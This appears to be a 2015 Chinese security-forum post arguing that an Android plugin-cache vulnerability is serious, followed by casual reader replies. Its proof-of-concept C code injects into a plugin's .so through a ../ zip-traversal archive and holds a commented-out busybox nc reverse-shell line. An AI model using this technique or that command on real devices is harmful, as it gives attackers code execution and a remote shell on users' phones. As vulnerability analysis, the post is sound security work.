当前位置:WooYun(白帽子技术社区) >> 移动终端安全 >> Android寄生兽漏洞并非夸大

Android寄生兽漏洞并非夸大

瘦蛟舞 (科普是一种公益行为) | 2015-07-10 18:44

川大信安文章被夸大的安卓漏洞“寄生兽” 中指出

实际上大部分app都会将插件的缓存文件存放在私有目录下,由于Android的沙箱机制,攻击者要利用这个漏洞首先需要突破沙箱保护。可以看到,360提出的4种攻击场景全部利用了其他的漏洞或者app开发者的粗心大意,从而突破了沙箱保护。
另一方面,由于odex文件与VM版本相关,同一个odex无法在多个设备中正常运行,攻击者需要对识别不同的设备并适配不同的恶意odex,漏洞利用成本进一步加大。
总结一下漏洞利用成功的先决条件:
1.Android版本低于5.0
2.利用了其他可突破沙箱保护的 漏洞
3.适配设备的odex文件实例


文章理论均正确,但是我认为此漏洞并非夸大.

首先现在绝大部分手机都在 android5.0以下.其次利用解压缩../跨目录本就是此漏洞利用亮点之一.

再次注入的时候可以选择 so 这样就不需要适配机型(覆盖 arm 和 x64的即可)

jint JNICALL JNI_OnLoad(JavaVM* vm, void* reserved)
{
    JNIEnv* env = NULL;
    jint result = -1;
    int ret;

    if ((*vm)->GetEnv(vm, (void**) &env, JNI_VERSION_1_4) != JNI_OK) {
        return -1;
    }
    /* success -- return valid version number */
    result = JNI_VERSION_1_4;
//    ret = system("busybox nc 192.168.1.50 8088|/system/bin/sh|busybox nc 192.168.1.50 9999");
    ret = system("id > /sdcard/jni_id.txt");
    LOGI("ret value of system is %d",ret);

    return result;
}


ndk 编译上述代码后追加到原有 so,再利用制作../的压缩包 exp.

$ cat  /sdcard/jni_id.txt                                
uid=10158(u0_a158) gid=10158(u0_a158) groups=1015(sdcard_rw),1028(sdcard_r),3002(net_bt),3003(inet),50158(all_a158) context=u:r:untrusted_app:s0


PS:

2.DexClassLoader方法的第二个参数(即odex的存放路径)不要指定在sdcard上

这样写直接会报错...

分享到:
  1. 1#
    回复此人 感谢
    瘦蛟舞 (科普是一种公益行为) | 2015-07-10 18:49

    当然插件不一定有 so,而且这种方法有一定概率导致插件崩溃~不过JNI_OnLoad会先被执行的~

  2. 2#
    回复此人 感谢
    找寻者 (学习中,请不吝赐教) | 2015-07-10 18:54

    前排,沙发- -#

    不懂andorid,但在努力的学习了 另外,问下,谁把wooyun门票的玄机破出来了。。。我还没

  3. 3#
    回复此人 感谢
    sadn3s | 2015-07-10 21:45

    我的版本高- -

  4. 4#
    回复此人 感谢
    随随意意 (RedFreever007pyphrb的徒弟) | 2015-07-10 21:50

    @找寻者 门票有玄机?不就是一张纸么?

  5. 5#
    回复此人 感谢
    马云 (赞成淘宝开通WB支付的请点击感谢) | 2015-07-10 22:24

    @随随意意 纸内有秘籍

  6. 6#
    回复此人 感谢
    随随意意 (RedFreever007pyphrb的徒弟) | 2015-07-10 22:59

    @马云 没看到秘籍啊,什么鬼啊

  7. 7#
    回复此人 感谢
    找寻者 (学习中,请不吝赐教) | 2015-07-11 09:27

    wooyun.png

    @随随意意 这个。。。真有

  8. 8#
    回复此人 感谢
    随随意意 (RedFreever007pyphrb的徒弟) | 2015-07-11 09:39

    @找寻者 难道是二维码上面的那串字母?还是外面那层包装上有点像电路图的东西

  9. 9#
    回复此人 感谢
    找寻者 (学习中,请不吝赐教) | 2015-07-11 10:22

    @随随意意 我是这么猜测的,不知道对不对,具体的先不说。。我还没解出来呢,也不知道对不对

  10. 10#
    回复此人 感谢
    问题来了 | 2015-07-20 12:15

    顶~

  11. 11#
    回复此人 感谢
    xFrank | 2015-07-22 21:56

    小白发问:为什么我不能在这里发帖?

  12. 12#
    回复此人 感谢
    瘦蛟舞 (科普是一种公益行为) | 2015-07-23 10:03

    @xFrank 加入该领域,然后 rank超过路人,上述条件不满足可以到内容分享去发贴...如果低于5WB将无法进入社区额...

  13. 13#
    回复此人 感谢
    appeal | 2015-07-23 17:37

    @瘦蛟舞 QQ多少?请教点东西。

  14. 14#
    回复此人 感谢
    瘦蛟舞 (科普是一种公益行为) | 2015-07-23 17:44

    @appeal 已私信

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录